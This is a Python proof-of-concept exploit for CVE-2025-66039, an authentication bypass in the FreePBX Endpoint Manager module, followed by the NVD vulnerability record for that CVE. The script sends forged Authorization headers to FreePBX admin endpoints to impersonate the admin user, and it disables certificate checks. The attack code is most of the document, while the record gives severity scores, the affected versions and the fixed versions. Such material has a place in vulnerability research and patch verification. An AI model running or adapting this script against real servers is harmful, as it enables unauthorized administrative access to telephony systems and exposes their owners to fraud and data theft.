CVE-2025-66039

import requests import sys # CVE-2025-66039 PoC - FreePBX Endpoint Manager Authentication Bypass # Target: FreePBX systems with Endpoint Manager module # Condition: Authentication type set to 'webserver' def exploit_auth_bypass(target_url, target_user="admin"): """ Exploit authentication bypass in FreePBX Endpoint Manager By providing arbitrary Authorization header, attacker can associate session with target user regardless of valid credentials. """ endpoints = [ "/admin/ajax.php?module=endpoint&command=update_endpoint", "/admin/ajax.php?module=endpoint&command=get_endpoints", "/admin/config.php?display=endpoint" ] # Construct arbitrary Authorization header # System incorrectly associates session with target_user headers = { 'Authorization': f'Basic {target_user}:arbitrary_password', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/json' } print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to authenticate as: {target_user}") print(f"[*] Using arbitrary Authorization header") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check for successful authentication indicators if response.status_code == 200: if 'authenticated' in response.text.lower() or 'success' in response.text.lower(): print(f"[+] VULNERABLE: Authentication bypass successful at {endpoint}") print(f"[+] Response: {response.text[:200]}") return True elif 'unauthorized' not in response.text.lower(): print(f"[*] Possible access at {endpoint} - Status: {response.status_code}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[-] No vulnerable endpoints found or target not affected") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-66039.py <target_url>") print("Example: python cve-2025-66039.py https://freepbx.example.com") sys.exit(1) target = sys.argv[1] exploit_auth_bypass(target)

{"cve": {"id": "CVE-2025-66039", "sourceIdentifier": "[email protected]", "published": "2025-12-09T22:16:15.757", "lastModified": "2026-02-02T14:47:12.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. Versions are vulnerable to authentication bypass when the authentication type is set to \"webserver.\" When providing an Authorization header with an arbitrary value, a session is associated with the target user regardless of valid credentials. This issue is fixed in versions 16.0.44 and 17.0.23."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.0.44", "matchCriteriaId": "703A0A9A-676E-473F-A3B3-69E6316ACABF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.0.1", "versionEndExcluding": "17.0.23", "matchCriteriaId": "D7313952-094B-4519-946E-3726B0E4C7AD"}]}]}], "references": [{"url": "https://github.com/FreePBX/framework/commit/04224253156543cd9932b90458660b2f19fc0e35#diff-72f14a52840a61504a8e03cd195035b44e488aecd634b001bc6412a04bdc940bR20-R50", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/FreePBX/security-reporting/security/advisories/GHSA-9jvh-mv6x-w698", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80", "source": "[email protected]", "tags": ["Not Applicable", "Vendor Advisory"]}]}}